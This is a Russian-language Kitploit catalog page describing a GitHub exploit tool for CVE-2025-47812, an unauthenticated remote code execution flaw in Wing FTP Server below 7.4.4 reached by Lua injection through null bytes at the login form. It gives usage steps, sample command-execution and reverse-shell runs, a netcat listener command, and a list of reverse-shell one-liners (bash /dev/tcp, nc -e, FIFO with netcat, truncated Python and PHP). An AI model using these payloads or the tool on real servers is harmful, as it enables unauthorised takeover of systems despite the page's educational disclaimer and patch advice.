Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-47812 — Эксплойт неаутентифицированного удаленного выполнения кода для Wing FTP Server < 7.4.4, обеспечивающий выполнение команд и обратные оболочки через Lua-инъекцию в файлах сеансов. | Kitploit
Инструменты/GitHubGitHub/blindma1den/cve-2025-47812
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и ОбразованиеRed TeamingИнструмент Удаленного Доступа
GitHubblindma1den/cve-2025-47812

CVE-2025-47812

Эксплойт неаутентифицированного удаленного выполнения кода для Wing FTP Server < 7.4.4, обеспечивающий выполнение команд и обратные оболочки через Lua-инъекцию в файлах сеансов.

171 год назадЕщё не проверено
Репозиторий

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-47812 - Удаленное выполнение кода (RCE) в Wing FTP Server

===========================================================

Автор: blindma1den

Дата: июль 2025

Тип эксплойта: Удаленное выполнение кода (без аутентификации)

Цель: Wing FTP Server < 7.4.4

Оценка CVSS: 10.0 (критическая)


ОПИСАНИЕ

Этот скрипт эксплуатирует CVE-2025-47812 — критическую уязвимость в веб-интерфейсе Wing FTP Server, которая позволяет удаленным злоумышленникам выполнять произвольные системные команды или открывать reverse shell без аутентификации.

Недостаток вызван некорректной обработкой нулевых байтов (%00) в форме входа (/loginok.html). Это позволяет внедрить Lua-код в файлы сессий, которые позже выполняются при обращении к таким конечным точкам, как /dir.html.


ИСТОЧНИКИ

Описание NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-47812


ВОЗМОЖНОСТИ

  • Выполнение команд (например, whoami, uname -a)
  • Несколько payload-ов для reverse shell
  • Автоматическое извлечение cookie сессии UID
  • Чистая модульная реализация на Python 3

ТРЕБОВАНИЯ

  • Python 3.7+
  • Модуль requests

Установка зависимостей:

pip install requests

ИСПОЛЬЗОВАНИЕ

Запустите скрипт:

python3 wingftp_rce_exploit.py

Вас попросят указать:

  • Целевой URL (например, http://127.0.0.1:5466)
  • Имя пользователя (по умолчанию: anonymous)
  • Режим эксплойта: [1] Выполнить команду [2] Запустить reverse shell

ПРИМЕРЫ

[1] ВЫПОЛНЕНИЕ КОМАНДЫ:

Target URL: http://192.168.1.10:5466
Username: anonymous
Your choice (1 or 2): 1
Command to execute (default: whoami): whoami

[2] REVERSE SHELL:

Target URL: http://192.168.1.10:5466
Username: anonymous
Your choice (1 or 2): 2
Reverse shell IP address: 192.168.1.100
Reverse shell port: 4444

Запустите свой listener перед активацией shell:

nc -lvnp 4444

ИСПОЛЬЗУЕМЫЕ PAYLOAD-Ы (REVERSE SHELL)

Bash: bash -i >& /dev/tcp/IP/PORT 0>&1

Python3: python3 -c 'import socket,subprocess,os; ...'

Netcat: nc IP PORT -e /bin/sh

PHP: php -r '$sock=fsockopen("IP",PORT); ...'

FIFO + Netcat: rm /tmp/f; mkfifo /tmp/f; cat /tmp/f|/bin/sh -i ...


ОТКАЗ ОТ ОТВЕТСТВЕННОСТИ

Этот код предназначен только для образовательных целей. НЕ используйте данный эксплойт против систем, которыми вы не владеете или на тестирование которых у вас нет явного разрешения. Несанкционированное использование незаконно и неэтично.

Немедленно обновите свои системы. Wing FTP Server 7.4.4 устраняет данную уязвимость.

Удачного хакинга!

Скачать инструмент